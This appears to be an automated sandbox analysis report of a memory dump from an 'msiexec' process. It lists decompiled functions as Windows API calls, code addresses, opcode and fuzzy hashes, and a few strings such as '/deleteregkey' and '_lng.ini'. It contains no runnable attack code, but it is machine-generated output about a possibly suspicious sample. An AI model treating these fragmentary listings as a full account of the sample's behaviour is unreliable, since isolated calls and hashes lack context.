                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                    • String ID:
                                                    • API String ID: 2754987064-0
                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                    APIs
                                                    • memset.MSVCRT ref: 0040F6E2
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                    • strlen.MSVCRT ref: 0040F70D
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                    • String ID:
                                                    • API String ID: 2754987064-0
                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                    APIs
                                                    • memset.MSVCRT ref: 00402FD7
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                    • strlen.MSVCRT ref: 00403006
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                    • String ID:
                                                    • API String ID: 2754987064-0
                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscpy$CloseHandle
                                                    • String ID: General
                                                    • API String ID: 3722638380-26480598
                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                    APIs
                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                    • String ID:
                                                    • API String ID: 764393265-0
                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                    APIs
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Time$System$File$LocalSpecific
                                                    • String ID:
                                                    • API String ID: 979780441-0
                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                    APIs
                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$DialogHandleModuleParam
                                                    • String ID:
                                                    • API String ID: 1386444988-0
                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID:
                                                    • API String ID: 613200358-0
                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                    APIs
                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: InvalidateMessageRectSend
                                                    • String ID: d=E
                                                    • API String ID: 909852535-3703654223
                                                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                    APIs
                                                    • wcschr.MSVCRT ref: 0040F79E
                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcschr$memcpywcslen
                                                    • String ID: "
                                                    • API String ID: 1983396471-123907689
                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                    APIs
                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FilePointer_memicmpmemcpy
                                                    • String ID: URL
                                                    • API String ID: 2108176848-3574463123
                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                    APIs
                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _snwprintfmemcpy
                                                    • String ID: %2.2X
                                                    • API String ID: 2789212964-323797159
                                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _snwprintf
                                                    • String ID: %%-%d.%ds
                                                    • API String ID: 3988819677-2008345750
                                                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                    APIs
                                                    • memset.MSVCRT ref: 0040E770
                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: MessageSendmemset
                                                    • String ID: F^@
                                                    • API String ID: 568519121-3652327722
                                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PlacementWindowmemset
                                                    • String ID: WinPos
                                                    • API String ID: 4036792311-2823255486
                                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??3@DeleteObject
                                                    • String ID: r!A
                                                    • API String ID: 1103273653-628097481
                                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                    APIs
                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                    • String ID: _lng.ini
                                                    • API String ID: 383090722-1948609170
                                                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                    APIs
                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                    • API String ID: 2773794195-880857682
                                                    • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                    • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                    • memset.MSVCRT ref: 0042BAAE
                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memset
                                                    • String ID:
                                                    • API String ID: 438689982-0
                                                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                    APIs
                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@$memset
                                                    • String ID:
                                                    • API String ID: 1860491036-0
                                                    • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                    • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                    APIs
                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                    • free.MSVCRT ref: 0040A908
                                                    • free.MSVCRT ref: 0040A92B
                                                    • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free$memcpy$mallocwcslen
                                                    • String ID:
                                                    • API String ID: 726966127-0
                                                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                    APIs
                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                    • free.MSVCRT ref: 0040B201
                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                    • free.MSVCRT ref: 0040B224
                                                    • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free$memcpy$mallocwcslen
                                                    • String ID:
                                                    • API String ID: 726966127-0
                                                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                    APIs
                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcmp$memcpy
                                                    • String ID:
                                                    • API String ID: 231171946-0
                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                    APIs
                                                    • strlen.MSVCRT ref: 0040B0D8
                                                    • free.MSVCRT ref: 0040B0FB
                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                    • free.MSVCRT ref: 0040B12C
                                                    • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free$memcpy$mallocstrlen
                                                    • String ID:
                                                    • API String ID: 3669619086-0
                                                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@
                                                    • String ID:
                                                    • API String ID: 1033339047-0
                                                    • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
